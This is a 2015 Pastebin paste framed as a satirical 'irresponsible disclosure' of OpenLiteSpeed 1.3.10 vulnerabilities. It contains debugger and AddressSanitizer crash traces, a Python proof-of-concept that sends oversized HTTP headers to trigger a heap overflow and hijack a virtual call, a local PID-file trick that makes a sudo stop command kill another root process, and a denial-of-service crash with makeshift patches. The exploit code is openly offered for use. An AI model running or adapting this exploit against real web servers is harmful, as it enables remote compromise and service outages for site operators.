API tools faq
paste
Advertisement
Guest User

analbleed

a guest
May 14th, 2015
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.41 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3.  
  4. Multiple Vulnerabilities in Openlitespeed <= 1.3.10 - CVE-b045-73d a.k.a.
  5. Analbleed
  6.  
  7. This is an irresponsible disclosure of the vulnerability, which will bring
  8. large parts of the Internet into its knees - CVE-b045-73d a.k.a Analbleed.
  9. Obviously you can find the fancy logo for it above (officially approved by
  10. the security community and industry worldwide). You can also listen to the
  11. O.S.T. on the vuln's official website free of charge (as for now) here at
  12. http://analbleed.com. If you are interested in purchasing t-shirts, cups,
  13. stickers etc. visit our on-line shop on the same page. Special offer
  14. includes also a vademecum treating about all logo branded vulns released so
  15. far. You can now focus on studying their names, logos and more instead of
  16. actually doing your own research.
  17.  
  18. http://en.wikipedia.org/wiki/LiteSpeed_Technologies_Inc.: May 2013 : It is
  19. used by 2% of all websites according to W3Techs,[9] making it the 4th most
  20. popular web servers.
  21.  
  22. Yup, whatever. Please, think of the kittens -
  23. http://en.wikipedia.org/wiki/Every_time_you_masturbate..._God_kills_a_kitten
  24.  
  25. Ok, here comes the Analbleed pain...
  26.  
  27. source:
  28. =======
  29. int Appender::append(LoggingEvent *pEvent)
  30. {
  31. char achBuf[9000];
  32. char *pMessage = achBuf;
  33. int len;
  34. if (!pEvent)
  35. return -1;
  36. Layout *pLayout;
  37. if (pEvent->m_pLayout)
  38. pLayout = pEvent->m_pLayout;
  39. else
  40. pLayout = m_pLayout; ; this path is taken, m_pLayout is on overwritten heap
  41. if (pLayout)
  42. len = pLayout->format(pEvent, pMessage, sizeof(achBuf)); ; SIGSEGV here
  43. else
  44. {
  45. pMessage = (char *)pEvent->m_pMessageBuf;
  46. len = pEvent->m_iMessageLen;
  47. }
  48. return append(pMessage, len);
  49. }
  50.  
  51.  
  52. gdb (aftermath):
  53. ================
  54. Program received signal SIGSEGV, Segmentation fault.
  55. [----------------------------------registers-----------------------------------]
  56. RAX: 0x0
  57. RBX: 0x7df6f0 --> 0x4f61d0 --> 0x4b9480 (<log4cxx::FileAppender::~FileAppender()>: mov QWORD PTR [rdi],0x4df2b0)
  58. RCX: 0x2328 ('(#')
  59. RDX: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
  60. RSI: 0x7fffffffc390 --> 0x1388
  61. RDI: 0x77f660 ('!' <repeats 200 times>...)
  62. RBP: 0x7df780 --> 0x4f6110 --> 0x4b90b0 (<log4cxx::Logger::~Logger()>: mov QWORD PTR [rdi],0x4df2b0)
  63. RSP: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
  64. RIP: 0x4b8c37 (<log4cxx::Appender::append(log4cxx::LoggingEvent*)+55>: call QWORD PTR [r8+0x18])
  65. R8 : 0x2121212121212121 ('!!!!!!!!')
  66. R9 : 0x1
  67. R10: 0x552cf656
  68. R11: 0x0
  69. R12: 0x1388
  70. R13: 0x0
  71. R14: 0x7742c0 --> 0x7e4530 --> 0x54534f5000000000 ('')
  72. R15: 0x1
  73. EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
  74. 0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0, pEvent=0x7fffffffc390) at appender.cpp:63
  75. 63 len = pLayout->format(pEvent, pMessage, sizeof(achBuf));
  76.  
  77. gdb-peda$ bt
  78. #0 0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0, pEvent=0x7fffffffc390) at appender.cpp:63
  79. #1 0x00000000004b8fe8 in log4cxx::Logger::vlog (this=0x7df780, level=level@entry=0x1388,
  80. format=format@entry=0x4e5310 "[%s] Http request header is too big, abandon!", args=args@entry=0x7fffffffe418, no_linefeed=no_linefeed@entry=0x0)
  81. at logger.cpp:111
  82. #2 0x0000000000463876 in vnotice (args=0x7fffffffe418, format=<optimized out>, this=<optimized out>) at ../../src/log4cxx/logger.h:106
  83. #3 HttpLog::notice (pLogger=<optimized out>, fmt=fmt@entry=0x4e5310 "[%s] Http request header is too big, abandon!") at httplog.cpp:381
  84. #4 0x000000000047e1f4 in HttpSession::readToHeaderBuf (this=this@entry=0x774280) at httpsession.cpp:638
  85. #5 0x000000000048422b in HttpSession::onReadEx (this=0x774280) at httpsession.cpp:1645
  86. #6 0x0000000000474205 in NtwkIOLink::handleEvents (this=0x778a10, evt=<optimized out>) at ntwkiolink.cpp:310
  87. #7 0x00000000004c4ccc in epoll::waitAndProcessEvents (this=0x7923f0, iTimeoutMilliSec=<optimized out>) at epoll.cpp:190
  88. #8 0x0000000000469de2 in EventDispatcher::run (this=this@entry=0x7795c8) at eventdispatcher.cpp:219
  89. #9 0x0000000000451450 in HttpServerImpl::start (this=0x7795a0) at httpserver.cpp:406
  90. #10 0x0000000000457ca9 in HttpServer::start (this=<optimized out>) at httpserver.cpp:3216
  91. #11 0x000000000044a700 in LshttpdMain::main (this=this@entry=0x779350, argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at lshttpdmain.cpp:930
  92. #12 0x000000000044a672 in main (argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at main.cpp:109
  93. #13 0x00007ffff5cc9ec5 in __libc_start_main (main=0x44a640 <main(int, char**)>, argc=0x1, argv=0x7fffffffe758, init=<optimized out>, fini=<optimized out>,
  94. rtld_fini=<optimized out>, stack_end=0x7fffffffe748) at libc-start.c:287
  95. #14 0x000000000044be52 in _start ()
  96.  
  97. gdb-peda$ disas
  98. Dump of assembler code for function log4cxx::Appender::append(log4cxx::LoggingEvent*):
  99. 0x00000000004b8c00 <+0>: push rbx
  100. 0x00000000004b8c01 <+1>: sub rsp,0x2330
  101. 0x00000000004b8c08 <+8>: mov rax,QWORD PTR fs:0x28
  102. 0x00000000004b8c11 <+17>: mov QWORD PTR [rsp+0x2328],rax
  103. 0x00000000004b8c19 <+25>: xor eax,eax
  104. 0x00000000004b8c1b <+27>: test rsi,rsi
  105. 0x00000000004b8c1e <+30>: je 0x4b8c82 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+130>
  106. 0x00000000004b8c20 <+32>: mov rbx,rdi
  107. 0x00000000004b8c23 <+35>: mov rdi,QWORD PTR [rsi+0x20]; 0x7fffffffc390 + 0x20 = 0x7fffffffc3b0 = 0x0 ?!?!?
  108. 0x00000000004b8c27 <+39>: test rdi,rdi
  109. 0x00000000004b8c2a <+42>: je 0x4b8c70 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+112>
  110. 0x00000000004b8c2c <+44>: mov r8,QWORD PTR [rdi] ; 0x77f660 -> '!' <repeats 200 times>...
  111. 0x00000000004b8c2f <+47>: mov ecx,0x2328
  112. 0x00000000004b8c34 <+52>: mov rdx,rsp
  113. => 0x00000000004b8c37 <+55>: call QWORD PTR [r8+0x18] ; SIGSEGV on $r8 + 0x18 = 0x2121212121212139
  114. 0x00000000004b8c3b <+59>: mov rcx,rsp
  115. 0x00000000004b8c3e <+62>: mov edx,eax
  116. 0x00000000004b8c40 <+64>: mov r8,QWORD PTR [rbx]
  117. 0x00000000004b8c43 <+67>: mov rsi,rcx
  118. 0x00000000004b8c46 <+70>: mov rdi,rbx
  119. 0x00000000004b8c49 <+73>: call QWORD PTR [r8+0x38]
  120. 0x00000000004b8c4d <+77>: mov rcx,QWORD PTR [rsp+0x2328]
  121. 0x00000000004b8c55 <+85>: xor rcx,QWORD PTR fs:0x28
  122. 0x00000000004b8c5e <+94>: jne 0x4b8c89 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+137>
  123. 0x00000000004b8c60 <+96>: add rsp,0x2330
  124. 0x00000000004b8c67 <+103>: pop rbx
  125. 0x00000000004b8c68 <+104>: ret
  126. 0x00000000004b8c69 <+105>: nop DWORD PTR [rax+0x0]
  127. 0x00000000004b8c70 <+112>: mov rdi,QWORD PTR [rbx+0x18]
  128. 0x00000000004b8c74 <+116>: test rdi,rdi
  129. 0x00000000004b8c77 <+119>: jne 0x4b8c2c <log4cxx::Appender::append(log4cxx::LoggingEvent*)+44>
  130. 0x00000000004b8c79 <+121>: mov rcx,QWORD PTR [rsi+0x10]
  131. 0x00000000004b8c7d <+125>: mov edx,DWORD PTR [rsi+0x18]
  132. 0x00000000004b8c80 <+128>: jmp 0x4b8c40 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+64>
  133. 0x00000000004b8c82 <+130>: mov eax,0xffffffff
  134. 0x00000000004b8c87 <+135>: jmp 0x4b8c4d <log4cxx::Appender::append(log4cxx::LoggingEvent*)+77>
  135. 0x00000000004b8c89 <+137>: call 0x449720 <__stack_chk_fail@plt>
  136. End of assembler dump.
  137.  
  138. gdb-peda$ p *(log4cxx::LoggingEvent*)$rsi
  139. $5 = {
  140. m_level = 0x1388,
  141. m_flag = 0x0,
  142. m_pLoggerName = 0x7df7d4 "Example",
  143. m_pMessageBuf = 0x7fffffffc3d0 "[127.0.0.1:34846] Http request header is too big, abandon!",
  144. m_iMessageLen = 0x3a,
  145. m_pLayout = 0x0,
  146. m_timestamp = {
  147. tv_sec = 0x552cf656,
  148. tv_usec = 0xa5ec6
  149. }
  150. }
  151.  
  152. gdb-peda$ p *pLayout
  153. $5 = {
  154. <Duplicable> = {
  155. _vptr.Duplicable = 0x2121212121212121,
  156. m_sName = {
  157. <AutoStr> = {
  158. m_pStr = 0x2121212121212121 <error: Cannot access memory at address 0x2121212121212121>
  159. },
  160. members of AutoStr2:
  161. m_iStrLen = 0x21212121
  162. }
  163. },
  164. members of log4cxx::Layout:
  165. m_pUserData = 0x2121212121212121
  166. }
  167.  
  168.  
  169. ASAN:
  170. =====
  171. ==24207==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62700000a100 at pc 0x7ffff5c1dd4c bp 0x7fffffffe0d0 sp 0x7fffffffe0a8
  172. WRITE of size 2796 at 0x62700000a100 thread T0
  173. #0 0x7ffff5c1dd4b in memmove (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x34d4b)
  174. #1 0x488dda in AutoBuf::appendNoCheck(char const*, int) (/home/jbieber/ospeed/bin/openlitespeed+0x488dda)
  175. #2 0x488adb in AccessLog::appendStr(char const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:652 // must be <= 4096
  176. #3 0x48892b in AccessLog::log(HttpSession*) /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:627 // logs referer and user-agent hdrs
  177. #4 0x4a2de0 in HttpVHost::logAccess(HttpSession*) const /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:354
  178. #5 0x4bb9ec in HttpSession::logAccess(int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:184
  179. #6 0x4c012e in HttpSession::closeConnection() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1860
  180. #7 0x4bbce3 in HttpSession::nextRequest() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:266 // must be non keep-alive; best use HTTP/1.0
  181. #8 0x4bf01c in HttpSession::handlerProcess(HttpHandler const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1371
  182. #9 0x4bea64 in HttpSession::processURI(int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1228
  183. #10 0x4be070 in HttpSession::redirect(char const*, int, int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1011
  184. #11 0x4bf529 in HttpSession::sendHttpError(char const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1536
  185. #12 0x4c49c9 in HttpSession::httpError(int, char const*) ../../src/http/httpsession.h:287
  186. #13 0x4bfa62 in HttpSession::onReadEx() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1692
  187. #14 0x4ace2a in NtwkIOLink::onRead(NtwkIOLink*) /home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:745
  188. #15 0x4ab7d5 in NtwkIOLink::handleEvents(short) /home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:310
  189. #16 0x52611c in epoll::waitAndProcessEvents(int) /home/jbieber/openlitespeed-1.3.8/src/edio/epoll.cpp:261
  190. #17 0x49efeb in EventDispatcher::run() /home/jbieber/openlitespeed-1.3.8/src/http/eventdispatcher.cpp:219
  191. #18 0x4769bc in HttpServerImpl::start() /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:406
  192. #19 0x47e25f in HttpServer::start() /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3216
  193. #20 0x473dff in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:930
  194. #21 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
  195. #22 0x7ffff4df1ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  196. #23 0x471698 (/home/jbieber/ospeed/bin/openlitespeed+0x471698)
  197.  
  198. 0x62700000a100 is located 0 bytes to the right of 12288-byte region [0x627000007100,0x62700000a100)
  199. allocated by thread T0 here:
  200. #0 0x7ffff5c3da96 in __interceptor_realloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54a96)
  201. #1 0x539e51 in AutoBuf::allocate(int) /home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:42
  202. #2 0x539dcd in AutoBuf::AutoBuf(int) /home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:26
  203. #3 0x487f46 in AccessLog::AccessLog() /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:446
  204. #4 0x4a22a2 in HttpVHost::setAccessLogFile(char const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:194
  205. #5 0x486837 in HttpLogSource::initAccessLog(XmlNode const*, long*) /home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:117
  206. #6 0x4865d9 in HttpLogSource::initAccessLog(XmlNode const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:69
  207. #7 0x4a7a76 in HttpVHost::config(XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2044
  208. #8 0x4a8781 in HttpVHost::configVHost(XmlNode const*, char const*, char const*, char const*, char const*, XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2307
  209. #9 0x4a8a52 in HttpVHost::configVHost(XmlNode*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2370
  210. #10 0x47ca8b in HttpServerImpl::configVHosts(XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2227
  211. #11 0x47db52 in HttpServerImpl::configServer(int, XmlNode*) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2586
  212. #12 0x47df45 in HttpServerImpl::initServer(XmlNode*, int&, int) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2775
  213. #13 0x47e7f1 in HttpServer::initServer(XmlNode*, int&, int) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3415
  214. #14 0x473354 in LshttpdMain::config() /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:629
  215. #15 0x473aff in LshttpdMain::init(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:846
  216. #16 0x473de2 in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:926
  217. #17 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
  218. #18 0x7ffff4df1ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  219.  
  220. SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memmove
  221.  
  222.  
  223. poc:
  224. ====
  225. #!/usr/bin/python
  226.  
  227. import sys
  228. import struct
  229. import socket
  230.  
  231. #
  232. # openlitespeed v1.3.10:
  233. #
  234. # Kali:
  235. # CANARY : ENABLED
  236. # FORTIFY : disabled
  237. # NX : ENABLED
  238. # PIE : disabled
  239. # RELRO : disabled
  240. #
  241. # Ubuntu:
  242. # CANARY : ENABLED
  243. # FORTIFY : ENABLED
  244. # NX : ENABLED
  245. # PIE : disabled
  246. # RELRO : Partial
  247. #
  248. # 00400000-0052e000 r-xp 00000000 fc:00 323891
  249. # /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
  250. # 0072d000-0072e000 r--p 0012d000 fc:00 323891
  251. # /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
  252. # 0072e000-00735000 rw-p 0012e000 fc:00 323891
  253. # /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
  254. # 00735000-007b0000 rw-p 00000000 00:00 0
  255. # [heap]
  256. # 007b0000-009d7000 rw-p 00000000 00:00 0
  257. # [heap]
  258. # 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0
  259. # [stack]
  260. #
  261. # .data base: 0x00000000007e1100
  262. # .data size: 0x001e1100
  263. #
  264. # for kernel.randomize_va_space=1 one can use .data segment which is
  265. # holding the request
  266. #
  267. # for kernel.randomize_va_space=2 one need to brute-force in order to find
  268. # the address holding our request
  269. #
  270. # final = .data_addr (brute-forced addr, e.g.: 0x8ab8c4) + 0xe32 (offset)
  271. #
  272.  
  273.  
  274. def sendnokeepalive(r):
  275. h = 'localhost'
  276. p = 8088
  277.  
  278. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  279. s.connect((h, p))
  280. s.send(r)
  281. r = s.recv(4096)
  282. s.close()
  283.  
  284. return s
  285.  
  286.  
  287. if __name__ == '__main__':
  288. daddr = int(sys.argv[1], 16) - 0x18 + 0xe32
  289. r8_offset_addr = struct.pack('<Q', daddr)
  290. print(" .data address: 0x%x") % daddr
  291.  
  292. gadget = 0x4141414141414141
  293. final = struct.pack('<Q', gadget)
  294. print("gadget address: 0x%x") % gadget
  295.  
  296. r1 = 'POST /w HTTP/0.9\n\rReferer: t\n\rUser-Agent: f\n\r\n\r'
  297.  
  298. r2 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
  299. r2 += 'Referer: ' + final + '!' * 3679 + '\n'
  300. r2 += 'Content-Type: ' + '!' * 3740 + '\n'
  301. r2 += 'Content-Type: ' + '!' * 3935 + '\n'
  302. r2 += 'Content-Type: ' + '!' * 4157 + '\n'
  303. r2 += 'Content-Type: ' + '!' * 4117 + '\n\n'
  304.  
  305. r3 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
  306. r3 += 'Referer: ' + 'AAAAAAAA' + '!' * 1500
  307. r3 += r8_offset_addr + '!' * 2171 + '\n'
  308. r3 += 'Content-Type: ' + '!' * 3740 + '\n'
  309. r3 += 'Content-Type: ' + '!' * 3935 + '\n'
  310. r3 += 'Content-Type: ' + '!' * 4157 + '\n'
  311. r3 += 'Content-Type: ' + '!' * 4117 + '\n\n'
  312.  
  313. # XXX: should be 5 or 6 reqs in total, 'while'
  314. # used for convenience during testing
  315. while(1):
  316. sendnokeepalive(r1)
  317. sendnokeepalive(r2)
  318. sendnokeepalive(r3)
  319.  
  320. sys.exit(0)
  321.  
  322.  
  323. patch:
  324. ======
  325. --- accesslog.cpp.orig 2015-04-23 23:11:31.265510318 +0200
  326. +++ accesslog.cpp 2015-04-23 23:54:48.921496609 +0200
  327. @@ -643,7 +643,7 @@ int AccessLog::appendStr(const char *pSt
  328. if (*pStr)
  329. {
  330. m_buf.append('"');
  331. - if ((len > 4096) || (m_buf.capacity() <= len + 2))
  332. + if ((len > 4096) || (m_buf.capacity() <= len + 2) || (m_buf.size() + len) >= LOG_BUF_SIZE)
  333. {
  334. flush();
  335. m_pAppender->append(pStr, len);
  336.  
  337.  
  338.  
  339. bonus features:
  340. ===============
  341. #1:
  342.  
  343. Neither /home/wrecking/ospeed/bin/lswsctrl.open nor make install check the
  344. /tmp/lshttpd/.
  345.  
  346. -- cut --
  347. $ id
  348. uid=1003(wrecking) gid=1003(ball) groups=1003(ball),4(adm),27(sudo)
  349.  
  350. $ ls -lah /tmp/lshttpd/
  351. total 15M
  352. drwxr-xr-x 4 wrecking ball 4.0K Apr 1 16:50 .
  353. drwxrwxrwt 12 root root 15M Apr 1 16:53 ..
  354. drwxr-xr-x 2 wrecking ball 4.0K Mar 6 16:42 bak_core
  355. -rw-r--r-- 1 wrecking ball 6 Apr 1 16:50 lshttpd.pid
  356. -rw-r--r-- 1 wrecking ball 446 Apr 1 16:18 .rtreport
  357. -rw-r--r-- 1 wrecking ball 174 Apr 1 16:17 .status
  358. drwx------ 12 wrecking ball 4.0K Mar 16 12:25 swap
  359.  
  360. $ sudo nc -l localhost -p 6666 -v &
  361. [1] 25222
  362. $ Listening on [localhost] (family 0, port 6666)
  363.  
  364. $ ps axuwww | grep local
  365. root 25222 0.0 0.0 73288 2132 pts/0 S+ 13:37 0:00 sudo nc -l
  366. localhost -p 6666
  367. root 25223 0.0 0.0 11224 784 pts/0 S+ 13:37 0:00 nc -l
  368. localhost -p 6666
  369.  
  370. $ echo 25222 > /tmp/lshttpd/lshttpd.pid
  371.  
  372. $ sudo /home/wrecking/ospeed/bin/lswsctrl.open stop
  373. [OK] litespeed: stopped.
  374.  
  375. $
  376. [1]+ Exit 140 sudo nc -l localhost -p 6666 -v
  377. $
  378. -- cut --
  379.  
  380.  
  381. #2:
  382. DoS while processing unknown headers. The poc test case is now >20MB so we
  383. will spare the fd and won't send it;] reading about delta debugging in
  384. progress, sorry.
  385.  
  386. asan:
  387. ==3678==ERROR: AddressSanitizer: SEGV on unknown address 0x61d74683afcc (pc 0x0000004b477c sp 0x7fffd40198e0 bp 0x7fffd4019950 T0)
  388. #0 0x4b477b in HttpReq::processHeaderLines() /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
  389. #1 0x4b3990 in HttpReq::processHeader() /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:224
  390. #2 0x4bce44 in HttpSession::readToHeaderBuf() /home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:614
  391. #3 0x4bf996 in HttpSession::onReadEx() /home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:1645
  392. #4 0x4acf54 in NtwkIOLink::onRead(NtwkIOLink*) /home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:745
  393. #5 0x4ab8ff in NtwkIOLink::handleEvents(short) /home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:310
  394. #6 0x527365 in epoll::waitAndProcessEvents(int) /home/jbieber/openlitespeed-1.3.10/src/edio/epoll.cpp:190
  395. #7 0x49f0f7 in EventDispatcher::run() /home/jbieber/openlitespeed-1.3.10/src/http/eventdispatcher.cpp:219
  396. #8 0x476abc in HttpServerImpl::start() /home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:406
  397. #9 0x47e34b in HttpServer::start() /home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:3216
  398. #10 0x473eff in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.10/src/main/lshttpdmain.cpp:930
  399. #11 0x47191f in main /home/jbieber/openlitespeed-1.3.10/src/main.cpp:109
  400. #12 0x7f78c3e41ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  401. #13 0x471798 (/home/jbieber/ospeed/bin/openlitespeed+0x471798)
  402.  
  403. AddressSanitizer can not provide additional info.
  404. SUMMARY: AddressSanitizer: SEGV /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543 HttpReq::processHeaderLines()
  405. ==3678==ABORTING
  406.  
  407. source:
  408. int HttpReq::processHeaderLines()
  409. {
  410. ...
  411. key_value_pair *pCurHeader = NULL;
  412. ...
  413. else
  414. {
  415. pCurHeader = newUnknownHeader();
  416. eCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
  417. ...
  418.  
  419. 2.
  420. key_value_pair *newUnknownHeader()
  421. { return newKeyValueBuf(m_headerIdxOff); }
  422.  
  423. 3.
  424. key_value_pair *HttpReq::newKeyValueBuf(int &idxOff)
  425. {
  426. char *p = NULL;
  427. int orgSize;
  428. int newSize;
  429. int used;
  430. if (idxOff == 0) // idxOff = m_headerIdxOff = 0x3e4
  431. {
  432. orgSize = 0;
  433. used = 0;
  434. }
  435. else
  436. {
  437. p = m_reqBuf.getPointer(idxOff); // m_pBuf + idxOff = 0x61d00000cc64 -> 0x74682e3500000028
  438. orgSize = *((int *)p); // 0x28
  439. used = *(((int *)p) + 1); // 0x74682e35
  440. }
  441. if (used == orgSize) // path not taken
  442. ...
  443. }
  444. ++*(((int *)p) + 1); // wtf?!
  445. return (key_value_pair *)(p + sizeof(int) * 2) + used;
  446.  
  447.  
  448. gdb:
  449. Breakpoint 1, HttpReq::newKeyValueBuf (this=0x619000014fa0, idxOff=@0x619000015090: 0x3e4) at httpreq.cpp:723
  450. 723 // 0xa
  451. gdb-peda$
  452. p = 0x61d00000cc64 "(" // p fucked up for some reason
  453. orgSize = 0x28
  454. newSize = 0x0
  455. used = 0x74682e35
  456.  
  457. $164 = 0x74682e35 // *(((int *)p) + 1)
  458. $165 = 0x28 // *((int *)p)
  459. $166 = 0x74682e36 // ++*(((int *)p) + 1)
  460.  
  461. Program received signal SIGSEGV, Segmentation fault.
  462.  
  463.  
  464. fucked up patch:
  465. --- src/http/httpreq.cpp.orig 2015-04-24 01:52:23.641459379 +0200
  466. +++ src/http/httpreq.cpp 2015-04-24 17:17:50.169166351 +0200
  467. @@ -49,6 +49,8 @@
  468. #include <stdlib.h>
  469. #include <unistd.h>
  470.  
  471. +#include <sys/mman.h>
  472. +
  473. #include <new>
  474. #include <util/ssnprintf.h>
  475.  
  476. @@ -539,6 +541,11 @@ int HttpReq::processHeaderLines()
  477. }
  478. else
  479. {
  480. + if (mprotect(&pCurHeader, sizeof(key_value_pair), PROT_READ|PROT_WRITE) == -1) {
  481. + LOG_INFO(("[%s] Status 500: failed on mprotect()!", getLogId()));
  482. + return SC_500;
  483. + }
  484. +
  485. pCurHeader = newUnknownHeader();
  486. pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
  487. pCurHeader->keyLen = skipSpace(pMark, pLineBegin) - pLineBegin;
  488.  
  489.  
  490. #3:
  491. In case you would wonder. Yes, thare are more bugs sitting out there. For
  492. example one that was found independently
  493. http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf
  494.  
  495. ThE EnD
  496.  
  497.  
  498. YXV0aG9ycyBvZiB0aGlzIGdlbSBhcmUqOgpjOGU3NGViZDgzOTJmZGE0Nzg4MTc5ZjlhMDJiYjQ5
  499. MzM3NjM4ZTdiCmIxZjk4Nzg5Y2MwM2Q2YTBkYjJlOGJkMzA5ZjlmMjNiNmU1NDY5M2UKZmMzYzNm
  500. NjM3NGFhNDQ0ZTc4Yzk0ZmQ0NjkyNWY5NGUxM2Y5YjU4NgoxMjBhZGNmOTczZTI4NGJmM2YzMjNl
  501. NGVhMGFlZjlmNWQ5ZjNiZGU5CgoqIFphIGV3ZW50dWFsbmUga29saXpqZSBuaWUgb2Rwb3dpYWRh
  502. bXkuCg==
  503.  
  504. Public Domain, 2015
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!